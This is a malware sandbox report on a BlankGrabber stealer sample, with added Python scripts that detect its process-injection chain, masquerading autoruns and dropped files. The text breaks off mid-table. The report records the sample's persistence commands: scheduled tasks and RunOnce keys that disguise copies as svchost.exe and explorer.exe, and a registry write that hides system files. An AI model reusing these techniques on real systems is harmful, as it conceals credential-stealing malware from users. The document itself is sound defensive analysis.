Malware Analysis Report

2024-10-10 08:21

Sample ID 240603-h7ha6ahb33
Target Bootloader.exe
SHA256 9145a2820d02861ab749bdb94dcbe432e3fdd414ec7d409b4e4317f744f08761
Tags
blankgrabber evasion persistence upx execution spyware stealer
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

9145a2820d02861ab749bdb94dcbe432e3fdd414ec7d409b4e4317f744f08761

Threat Level: Known bad

The file Bootloader.exe was found to be: Known bad.

Malicious Activity Summary

blankgrabber evasion persistence upx execution spyware stealer

A stealer written in Python and packaged with PyInstaller

Modifies visibility of hidden/system files in Explorer

Blankgrabber family

Command and Scripting Interpreter: PowerShell

UPX packed file

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Adds Run key to start application

Drops file in System32 directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Detects videocard installed

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Enumerates processes with tasklist

Gathers system information

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-03 07:22

Signatures

A stealer written in Python and packaged with PyInstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 07:22

Reported

2024-06-03 07:25

Platform

win7-20240508-en

Max time kernel

150s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Bootloader.exe"

Signatures

Modifies visibility of hidden/system files in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" \??\c:\windows\resources\svchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A (2 matches; no indicator or process recorded)

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" \??\c:\windows\resources\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" \??\c:\windows\resources\svchost.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\explorer.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification C:\Windows\SysWOW64\explorer.exe \??\c:\windows\resources\svchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
File opened for modification \??\c:\windows\resources\themes\explorer.exe C:\Windows\Resources\Themes\icsys.icn.exe N/A
File opened for modification \??\c:\windows\resources\spoolsv.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification \??\c:\windows\resources\svchost.exe \??\c:\windows\resources\spoolsv.exe N/A
File opened for modification C:\Windows\Resources\tjud.exe \??\c:\windows\resources\themes\explorer.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A (16 events)
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A (17 events)
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A (16 events)
N/A N/A \??\c:\windows\resources\svchost.exe N/A (15 events)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A

Suspicious use of WriteProcessMemory

Writer PID -> Target PID (events): writer image -> target image
1500 -> 3060 (4): C:\Users\Admin\AppData\Local\Temp\Bootloader.exe -> \??\c:\users\admin\appdata\local\temp\bootloader.exe  (target path ends in a trailing space)
3060 -> 2856 (3): \??\c:\users\admin\appdata\local\temp\bootloader.exe  -> \??\c:\users\admin\appdata\local\temp\bootloader.exe  (both paths end in a trailing space)
1500 -> 2232 (4): C:\Users\Admin\AppData\Local\Temp\Bootloader.exe -> C:\Windows\Resources\Themes\icsys.icn.exe
2232 -> 1832 (4): C:\Windows\Resources\Themes\icsys.icn.exe -> \??\c:\windows\resources\themes\explorer.exe
1832 -> 1612 (4): \??\c:\windows\resources\themes\explorer.exe -> \??\c:\windows\resources\spoolsv.exe
1612 -> 1280 (4): \??\c:\windows\resources\spoolsv.exe -> \??\c:\windows\resources\svchost.exe
1280 -> 1736 (4): \??\c:\windows\resources\svchost.exe -> \??\c:\windows\resources\spoolsv.exe
1832 -> 2324 (4): \??\c:\windows\resources\themes\explorer.exe -> C:\Windows\Explorer.exe
1280 -> 2088 (4): \??\c:\windows\resources\svchost.exe -> C:\Windows\SysWOW64\schtasks.exe
1280 -> 1912 (4): \??\c:\windows\resources\svchost.exe -> C:\Windows\SysWOW64\schtasks.exe
1280 -> 2044 (4): \??\c:\windows\resources\svchost.exe -> C:\Windows\SysWOW64\schtasks.exe
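The WriteProcessMemory table repeats each writer/target pair up to four times. The Python below is an added example, not part of the sandbox report: it collapses such rows into one edge per pair, prints the resulting chain and flags the two things worth a second look in this run, the sample spawning a file with its own name plus a trailing space, and copies under C:\Windows\Resources writing into genuine Windows binaries (C:\Windows\Explorer.exe, SysWOW64\schtasks.exe). ROWS is constructed from the behavioral1 table above; for this sample every edge also matches a parent/child pair in the Processes list, so the graph doubles as the process tree.

```python
"""Added example, not part of the sandbox report: rebuild the writer -> target graph
from the 'Suspicious use of WriteProcessMemory' rows and flag two patterns seen here.
ROWS is constructed from the behavioral1 table (one duplicate row is kept on purpose,
since the report repeats each pair several times)."""
import re
from collections import defaultdict

ROW = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+)(\s+)(\S+)( ?)$")
NT_PREFIX = re.compile(r"^\\\?\?\\")                 # "\??\" prefix on NT-form paths
LEGIT_DIRS = {"c:\\windows", "c:\\windows\\system32", "c:\\windows\\syswow64"}

ROWS = [
    r"PID 1500 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe \??\c:\users\admin\appdata\local\temp\bootloader.exe ",
    r"PID 1500 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe \??\c:\users\admin\appdata\local\temp\bootloader.exe ",
    r"PID 3060 wrote to memory of 2856 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  \??\c:\users\admin\appdata\local\temp\bootloader.exe ",
    r"PID 1500 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe C:\Windows\Resources\Themes\icsys.icn.exe",
    r"PID 2232 wrote to memory of 1832 N/A C:\Windows\Resources\Themes\icsys.icn.exe \??\c:\windows\resources\themes\explorer.exe",
    r"PID 1832 wrote to memory of 1612 N/A \??\c:\windows\resources\themes\explorer.exe \??\c:\windows\resources\spoolsv.exe",
    r"PID 1612 wrote to memory of 1280 N/A \??\c:\windows\resources\spoolsv.exe \??\c:\windows\resources\svchost.exe",
    r"PID 1280 wrote to memory of 1736 N/A \??\c:\windows\resources\svchost.exe \??\c:\windows\resources\spoolsv.exe",
    r"PID 1832 wrote to memory of 2324 N/A \??\c:\windows\resources\themes\explorer.exe C:\Windows\Explorer.exe",
    r"PID 1280 wrote to memory of 2088 N/A \??\c:\windows\resources\svchost.exe C:\Windows\SysWOW64\schtasks.exe",
    r"PID 1280 wrote to memory of 1912 N/A \??\c:\windows\resources\svchost.exe C:\Windows\SysWOW64\schtasks.exe",
    r"PID 1280 wrote to memory of 2044 N/A \??\c:\windows\resources\svchost.exe C:\Windows\SysWOW64\schtasks.exe",
]


def strip_nt(path):
    return NT_PREFIX.sub("", path).lower()


def parse_rows(rows):
    """One edge per (writer PID, target PID) with a hit count. A trailing space on the
    target path survives as group 6; on the writer path it only shows up as a doubled
    separator (group 4), which is the single trace the flattened table keeps of it."""
    edges = {}
    for row in rows:
        m = ROW.match(row)
        if not m:
            continue
        key = (int(m.group(1)), int(m.group(2)))
        edge = edges.setdefault(key, {
            "count": 0, "writer": m.group(3), "target": m.group(5),
            "writer_trailing_space": len(m.group(4)) > 1,
            "target_trailing_space": m.group(6) == " ",
        })
        edge["count"] += 1
    return edges


def roots_and_depth(edges):
    """Roots (writers that are never targets) and the longest writer -> target chain."""
    children = defaultdict(list)
    for writer, target in edges:
        children[writer].append(target)
    targets = {t for _, t in edges}
    roots = sorted({w for w, _ in edges} - targets)

    def depth(pid):
        return 1 + max((depth(c) for c in children[pid]), default=-1)

    return roots, max((depth(r) for r in roots), default=0)


def flags(edges):
    out = []
    for (w, t), e in edges.items():
        wi, ti = strip_nt(e["writer"]), strip_nt(e["target"])
        # Same visible name as the writer but with a trailing space: a second file that
        # ordinary Win32 path handling cannot tell apart from the original.
        if wi == ti and e["target_trailing_space"]:
            out.append(("same-name-trailing-space-spawn", w, t))
        # A copy living outside the system directories writing into a genuine Windows
        # binary (here C:\Windows\Explorer.exe and SysWOW64\schtasks.exe).
        if ti.rsplit("\\", 1)[0] in LEGIT_DIRS and wi.rsplit("\\", 1)[0] not in LEGIT_DIRS:
            out.append(("writes-into-genuine-windows-image", w, t))
    return out


def render(edges, pid, indent=0, lines=None):
    """Indented text tree, one line per edge, for a quick read of the chain."""
    lines = [] if lines is None else lines
    for target in sorted(t for w, t in edges if w == pid):
        e = edges[(pid, target)]
        lines.append(f"{'  ' * indent}{pid} -> {target} x{e['count']}  {e['target']}")
        render(edges, target, indent + 1, lines)
    return lines


if __name__ == "__main__":
    edges = parse_rows(ROWS)
    roots, depth = roots_and_depth(edges)
    for root in roots:
        print("\n".join(render(edges, root)))
    print(f"{len(edges)} distinct edges, chain depth {depth}")
    for flag in flags(edges):
        print(*flag)
```

Two branches fall out of the tree: Bootloader.exe (1500) feeds the trailing-space copy of itself (3060, then 2856), and separately icsys.icn.exe (2232), which fans out into the explorer.exe/spoolsv.exe/svchost.exe copies that register persistence.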

Processes

Image: C:\Users\Admin\AppData\Local\Temp\Bootloader.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Bootloader.exe"

Image: \??\c:\users\admin\appdata\local\temp\bootloader.exe  (image path ends in a trailing space)
Command line: c:\users\admin\appdata\local\temp\bootloader.exe 

Image: \??\c:\users\admin\appdata\local\temp\bootloader.exe  (image path ends in a trailing space)
Command line: c:\users\admin\appdata\local\temp\bootloader.exe 

Image: C:\Windows\Resources\Themes\icsys.icn.exe
Command line: C:\Windows\Resources\Themes\icsys.icn.exe

Image: \??\c:\windows\resources\themes\explorer.exe
Command line: c:\windows\resources\themes\explorer.exe

Image: \??\c:\windows\resources\spoolsv.exe
Command line: c:\windows\resources\spoolsv.exe SE

Image: \??\c:\windows\resources\svchost.exe
Command line: c:\windows\resources\svchost.exe

Image: \??\c:\windows\resources\spoolsv.exe
Command line: c:\windows\resources\spoolsv.exe PR

Image: C:\Windows\Explorer.exe
Command line: C:\Windows\Explorer.exe

Image: C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 07:24 /f

Image: C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 07:25 /f

Image: C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 07:26 /f

All three tasks use the same task name and /f, so each call overwrites the previous one; only the last daily trigger (07:26) remains.
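The RunOnce values, the ShowSuperHidden write and the three schtasks command lines in behavioral1 all point at Windows process names (explorer.exe, svchost.exe) that live outside the directories Windows runs them from. Windows deletes a RunOnce value after it has run, which is why both dropped copies re-write both values every time they start. The Python below is an added example, not part of the sandbox report: it applies that "system name, wrong directory" rule to registry and process events and also catches the ShowSuperHidden = 0 write. The event records are constructed to mirror the rows above (the doubled backslashes in the RunOnce data reproduce the report's rendering); the Contoso entries are invented benign records for contrast.

```python
"""Added example (not part of the sandbox report): flag the autorun, scheduled-task
and ShowSuperHidden artifacts recorded in behavioral1.

EVENTS is constructed to mirror the report's rows; the Contoso entries are invented
benign records used for contrast.
"""
import re
from pathlib import PureWindowsPath

# Names that Windows itself only runs from these directories; the same name anywhere
# else is masquerading. All comparisons are lower-case with no trailing separator.
SYSTEM_PROCESS_NAMES = {"explorer.exe", "svchost.exe", "spoolsv.exe", "lsass.exe",
                        "csrss.exe", "winlogon.exe", "services.exe"}
LEGIT_SYSTEM_DIRS = {"c:\\windows", "c:\\windows\\system32", "c:\\windows\\syswow64"}

NT_PREFIX = re.compile(r"^\\\?\?\\")                   # strips the "\??\" NT path prefix
TR_ARG = re.compile(r'/tr\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)


def normalize(path):
    """Lower-case a path and drop the NT prefix the sandbox prints on some images."""
    return NT_PREFIX.sub("", path).lower()


def first_path(cmdline):
    """Executable at the head of a command line or autorun value. Registry dumps
    double the backslashes, so undo that before splitting."""
    cmd = cmdline.replace("\\\\", "\\").strip()
    if cmd.startswith('"'):
        return cmd[1:cmd.find('"', 1)]
    return cmd.split(" ", 1)[0]


def is_masquerading(path):
    p = PureWindowsPath(normalize(path))
    return p.name in SYSTEM_PROCESS_NAMES and str(p.parent) not in LEGIT_SYSTEM_DIRS


def schtasks_target(cmdline):
    """Path launched by 'schtasks /create ... /tr <action>', or None."""
    m = TR_ARG.search(cmdline)
    if not m:
        return None
    return first_path(m.group(1) if m.group(1) is not None else m.group(2))


def analyze(events):
    findings = []
    for ev in events:
        if ev["type"] == "registry":
            key = ev["key"].lower()
            if key.endswith("\\explorer\\advanced\\showsuperhidden") and str(ev["data"]) == "0":
                findings.append(("hide-system-files", normalize(ev["process"])))
            elif "\\currentversion\\runonce\\" in key or "\\currentversion\\run\\" in key:
                target = normalize(first_path(ev["data"]))
                if is_masquerading(target):
                    findings.append(("autorun-masquerade", target))
        elif ev["type"] == "process" and normalize(ev["image"]).endswith("\\schtasks.exe"):
            target = schtasks_target(ev["cmdline"])
            if target and is_masquerading(target):
                findings.append(("schtask-masquerade", normalize(target)))
    return findings


SID = "S-1-5-21-2737914667-933161113-3798636211-1000"   # user SID from the behavioral1 rows
EVENTS = [
    {"type": "registry", "process": r"\??\c:\windows\resources\themes\explorer.exe",
     "key": "HKU\\" + SID + "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden",
     "data": "0"},
    {"type": "registry", "process": r"\??\c:\windows\resources\themes\explorer.exe",
     "key": r"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer",
     "data": r"c:\\windows\\resources\\themes\\explorer.exe RO"},
    {"type": "registry", "process": r"\??\c:\windows\resources\svchost.exe",
     "key": r"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost",
     "data": r"c:\\windows\\resources\\svchost.exe RO"},
    {"type": "registry", "process": r"C:\Program Files\Contoso\setup.exe",      # invented benign
     "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ContosoUpdater",
     "data": r'"C:\Program Files\Contoso\updater.exe" /quiet'},
    {"type": "process", "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 07:24 /f'},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",           # invented benign
     "cmdline": r'schtasks /create /tn "Backup" /tr "C:\Windows\System32\wbadmin.exe start backup" /sc weekly'},
]

if __name__ == "__main__":
    for kind, what in analyze(EVENTS):
        print(f"{kind:20} {what}")
```

The directory allow-list is deliberately short: a svchost.exe or explorer.exe anywhere other than C:\Windows, System32 or SysWOW64 is worth an alert on its own, before any hash lookup.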

Network

N/A

Files

memory/1500-0-0x0000000000400000-0x000000000041F000-memory.dmp

\Users\Admin\AppData\Local\Temp\bootloader.exe  (path ends in a trailing space; this is a different file from the submitted Bootloader.exe, SHA256 9145a2820d02861ab749bdb94dcbe432e3fdd414ec7d409b4e4317f744f08761)

MD5 c5f60a168ec3742ed37014166d488f29
SHA1 fd291b39f1238b740a13af5bddafa4fa1dcc276e
SHA256 04bec57f279eb39b6abc2a78fb6a4191f25982384fd42d1b1f9ef1036e9961ef
SHA512 a7376175af57b644446ab04b5d3e1ea5a54ed05084b0f0dcb87f5f8f314847a8f948d89fa87305df955e915e1c799daa842782079934cc281615a3c7d9343570

C:\Users\Admin\AppData\Local\Temp\_MEI30602\ucrtbase.dll

MD5 de4f74fd58a8ea32a956eac6d1eab5ef
SHA1 845ecad6a68993dcdff53ae34fea7ac85cc41d65
SHA256 37b6d4d11c20f2b0c693474cf0b7a61b568ea0c9c93f5a1e0eb6c780dd1e5edc
SHA512 d46d47471026c49fb4e44e8ecd8f37bb097a27b0a8984d596e85814905d34e2c950188b817405e94a2ee22d5c42328908218dcd91c16d86e5bd863eb5feadc24

C:\Users\Admin\AppData\Local\Temp\_MEI30602\api-ms-win-core-file-l1-2-0.dll

MD5 9d8413744097196f92327f632a85acee
SHA1 dfc07f5e5a0634dd1f15fdc9ff9731748fbff919
SHA256 6878d8168d5cc159efe58f14e5ba10310d99b53ab8495521e54c966994dac50b
SHA512 a8f6e9ee1c5d65f68b8b20d406d3e666c186e15cb3b92575257b5637fe7dd5ac7d75e9ad51c839ba4490512f68f6b48822fc9edd316dd7625d3627d3b975fb2a

C:\Users\Admin\AppData\Local\Temp\_MEI30602\api-ms-win-core-localization-l1-2-0.dll

MD5 b402ed77d6f31d825bda175dbc0c4f92
SHA1 1f2a4b8753b3aae225feac5487cc0011b73c0eb7
SHA256 6ed17fb3ca5156b39fbc1ef7d1eefa95e739857607de4cd8d41cecfcd1350705
SHA512 ec04013139f3fd9dbf22b92121d82b2eb97e136f8619790cde2d0b660280e838962f9006d3e4c3a359627b017f2b6ade7edff3bbc26e559c3de37540585602d9

C:\Users\Admin\AppData\Local\Temp\_MEI30602\api-ms-win-core-processthreads-l1-1-1.dll

MD5 3d872be898581f00d0310d7ab9abaf2b
SHA1 420e0ab98bb748723130de414f0ffed117ef3f7e
SHA256 4de821884cbef4182b29d8c33cfe13e43e130ad58ee1281679e8d40a2edcb8ea
SHA512 35cfb9888a5f4299403a0d9c57f0ba79e3625431a9acc5e04ae2ae101b3dc521a0dcff5d4a1bf508b25dbf05dd432f6987d860ff494d15538ed95673a8b7376b

C:\Users\Admin\AppData\Local\Temp\_MEI30602\api-ms-win-core-timezone-l1-1-0.dll

MD5 6c180c8de3ecf27de7a5812ff055737e
SHA1 3aad20b71bb374bb2c5f7431a1b75b60956a01fd
SHA256 630466fd77ac7009c947a8370a0d0c20652169824c54ddcb8c05e8df45e23197
SHA512 e4aa79eb2b6b3be9b545e8cb8b43cd6052036dc5cce7077be40441b9942931b30d76c475d550a178d4e94c9c366cabc852f500e482b7fdcd361fc2a08e41c00e

C:\Users\Admin\AppData\Local\Temp\_MEI30602\api-ms-win-core-file-l2-1-0.dll

MD5 361c6bcfcea263749419b0fbed7a0ce8
SHA1 03db13108ce9d5fc01cecf3199619ffbccbd855a
SHA256 b74aefd6fa638be3f415165c8109121a2093597421101abc312ee7ffa1130278
SHA512 aa8b585000cc65f9841b938e4523d91d8f6db650e0b4bb11efd740c27309bf81cdb77f05d0beda2489bf26f4fbc6d02c93ce3b64946502e2c044eea89696cc76

C:\Users\Admin\AppData\Local\Temp\_MEI30602\python312.dll

MD5 cbd02b4c0cf69e5609c77dfd13fba7c4
SHA1 a3c8f6bfd7ffe0783157e41538b3955519f1e695
SHA256 ecef0ed97c7b249af3c56cde0bfcae70f66530d716b48b5d94621c3dba8236b5
SHA512 a3760ecaa9736eb24370a0a20dd22a1ee53b3f8002195947bc7d21b239278ec8e26bcc131d0132c530767d1de59954be7946dcf54fcbf2584052c9d9a5615567

memory/2856-87-0x000007FEF5940000-0x000007FEF6019000-memory.dmp

\Windows\Resources\Themes\icsys.icn.exe

MD5 698d88fb05d36d26529983acaf2388dc
SHA1 34f64d655ed924588379609405645ecfc7af51e1
SHA256 69a15479cd6aa029c4af5752cac50035f13fc4e7500caa05b89ff854d9fade4d
SHA512 91da0b5fa4efe98b7a1ed06ebf8e26f7c1a2dc23d95433a355f307a4ef27ef1a455cbf8648e4825171e5ebfd6cb44a184d44221da4b8f5fa603611b426baed18

C:\Windows\Resources\Themes\explorer.exe

MD5 a07d08c3b74bbac55a8bb7861260eb9a
SHA1 aa8716a5f5bf22e922597f0dbf851defdd22f946
SHA256 47b173a965a4be9fc3e79c16b12559cb51af278dfe8bec3d3cee089d37514ec6
SHA512 9e89a744585756128191c3f371a23f642acd2d453e622bd4ab82b6b25458814b50437315593941fafdb2d709d500d51ce03d8f00b86387478e51c96d183bca4f

\Windows\Resources\spoolsv.exe

MD5 7a17b928dc5ad5b32c98d4f37ae26104
SHA1 3423abf369bf7891e35327629d2fc7509b361e1d
SHA256 c087cf47d439f83ea8576e50795dd8fbfe9510c79715bc8712d7d7cd8114e112
SHA512 4dd7ee88fbaa8dad706bde12580a2de3551e30a181a1f25fe150f04ac4214690173d5bafdfe88924d0ba090e74e5afe4f88f0816e90f2419eb33665410c1b9bf

memory/1612-171-0x0000000000400000-0x000000000041F000-memory.dmp

\Windows\Resources\svchost.exe

MD5 8c04e065dc1d4873d49c8af7fa30fd30
SHA1 fc8768112400f7996980086a7f497d6757636309
SHA256 cfd5b8769db8b8ad278b0ee74ab144424dad54c73c9b0c771f4302c636a6fe80
SHA512 cbf102aec94619584f68b3f927a1d9694ad06417830d2f7d5655a803eb564a7f02bc54a566220477644fbb42d56aa302380f292e4774d8fb8bae909251956765

memory/1280-185-0x00000000003E0000-0x00000000003FF000-memory.dmp

memory/1736-189-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1612-190-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2232-191-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1500-192-0x0000000000400000-0x000000000041F000-memory.dmp
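Two things in this file list deserve a closer look: the first entry's path ends in a trailing space and carries a different SHA256 from the submitted sample, and the _MEI30602 directory holds interpreter runtime (python312.dll, ucrtbase.dll and the api-ms-win stubs) rather than anything unique to this payload. The Python below is an added example, not part of the sandbox report: it buckets the listed paths, separates the hashes worth blocking from the generic runtime files, and groups the memory dumps by mapped-region size. The _MEI<pid><n> naming rule used to recover the extracting PID is an assumption about PyInstaller's bootloader that the report does not state; here the digits 30602 line up with PID 3060 in the WriteProcessMemory table. FILES and DUMPS reuse the paths and hashes printed above, abbreviated.

```python
"""Added example (not part of the sandbox report): triage the behavioral1 Files list.

FILES and DUMPS are constructed from the report's own rows (paths and SHA256 values as
printed there; the long api-ms-win DLL list is left out). The _MEI<pid><n> naming rule
is an assumption about the PyInstaller bootloader, not something the report states.
"""
import re

MEI_DIR = re.compile(r"[\\/]_MEI(\d+)[\\/]")
MEMDUMP = re.compile(r"^memory/(\d+)-\d+-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

FILES = [  # (path exactly as the report prints it, SHA256)
    ("\\Users\\Admin\\AppData\\Local\\Temp\\bootloader.exe ",          # trailing space
     "04bec57f279eb39b6abc2a78fb6a4191f25982384fd42d1b1f9ef1036e9961ef"),
    ("C:\\Users\\Admin\\AppData\\Local\\Temp\\_MEI30602\\ucrtbase.dll",
     "37b6d4d11c20f2b0c693474cf0b7a61b568ea0c9c93f5a1e0eb6c780dd1e5edc"),
    ("C:\\Users\\Admin\\AppData\\Local\\Temp\\_MEI30602\\python312.dll",
     "ecef0ed97c7b249af3c56cde0bfcae70f66530d716b48b5d94621c3dba8236b5"),
    ("\\Windows\\Resources\\Themes\\icsys.icn.exe",
     "69a15479cd6aa029c4af5752cac50035f13fc4e7500caa05b89ff854d9fade4d"),
    ("C:\\Windows\\Resources\\Themes\\explorer.exe",
     "47b173a965a4be9fc3e79c16b12559cb51af278dfe8bec3d3cee089d37514ec6"),
    ("\\Windows\\Resources\\spoolsv.exe",
     "c087cf47d439f83ea8576e50795dd8fbfe9510c79715bc8712d7d7cd8114e112"),
    ("\\Windows\\Resources\\svchost.exe",
     "cfd5b8769db8b8ad278b0ee74ab144424dad54c73c9b0c771f4302c636a6fe80"),
]
DUMPS = [
    "memory/1500-0-0x0000000000400000-0x000000000041F000-memory.dmp",
    "memory/2856-87-0x000007FEF5940000-0x000007FEF6019000-memory.dmp",
    "memory/1612-171-0x0000000000400000-0x000000000041F000-memory.dmp",
    "memory/1280-185-0x00000000003E0000-0x00000000003FF000-memory.dmp",
    "memory/1736-189-0x0000000000400000-0x000000000041F000-memory.dmp",
    "memory/2232-191-0x0000000000400000-0x000000000041F000-memory.dmp",
]
# PIDs that appear in the behavioral1 WriteProcessMemory table
PIDS_IN_REPORT = {1500, 3060, 2856, 2232, 1832, 1612, 1280, 1736, 2324, 2088, 1912, 2044}


def classify(path):
    """Bucket one dropped-file path from the report."""
    if path.endswith((" ", ".")):
        # Win32 path normalisation strips a trailing space or dot, so this file can only
        # be created or opened through the \\?\ (NT) path form; tools that open
        # "bootloader.exe" silently get the other file with the same visible name.
        return "trailing-space-or-dot"
    if MEI_DIR.search(path):
        return "pyinstaller-runtime"        # interpreter support files the loader unpacks
    if "\\windows\\resources\\" in path.lower():
        return "dropped-under-windows-resources"
    return "other"


def mei_parent_pid(path, known_pids):
    """Recover the extracting PID from a _MEI<pid><n> directory name (assumed scheme).
    Returns None unless exactly one known PID is a prefix leaving at most two digits."""
    m = MEI_DIR.search(path)
    if not m:
        return None
    digits = m.group(1)
    hits = [p for p in known_pids
            if digits.startswith(str(p)) and len(digits) - len(str(p)) <= 2]
    return hits[0] if len(hits) == 1 else None


def payload_hashes(files):
    """SHA256 values worth blocking: everything that is not interpreter runtime."""
    return sorted(sha for path, sha in files if classify(path) != "pyinstaller-runtime")


def pids_by_image_size(dumps):
    """Group dumped PIDs by mapped-region size. Equal sizes at the same or a relocated
    base are a cheap hint that several processes are running copies of one image."""
    groups = {}
    for name in dumps:
        m = MEMDUMP.match(name)
        if m:
            size = int(m.group(3), 16) - int(m.group(2), 16)
            groups.setdefault(size, set()).add(int(m.group(1)))
    return groups


if __name__ == "__main__":
    for path, sha in FILES:
        print(f"{classify(path):32} {sha[:16]}  {path!r}")
    print("PyInstaller parent PID:", mei_parent_pid(FILES[1][0], PIDS_IN_REPORT))
    for size, pids in sorted(pids_by_image_size(DUMPS).items()):
        print(f"mapped size 0x{size:X}: PIDs {sorted(pids)}")
```

On this report the grouping puts PIDs 1500, 1612, 1736, 2232 and 1280 together at 0x1F000 bytes (the infector copies) and leaves 2856 alone with a 0x6D9000-byte region, the 64-bit python312.dll mapping.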

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-03 07:22

Reported

2024-06-03 07:25

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Bootloader.exe"

Signatures

Modifies visibility of hidden/system files in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" \??\c:\windows\resources\svchost.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A (50 matches; no indicator or process recorded)

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
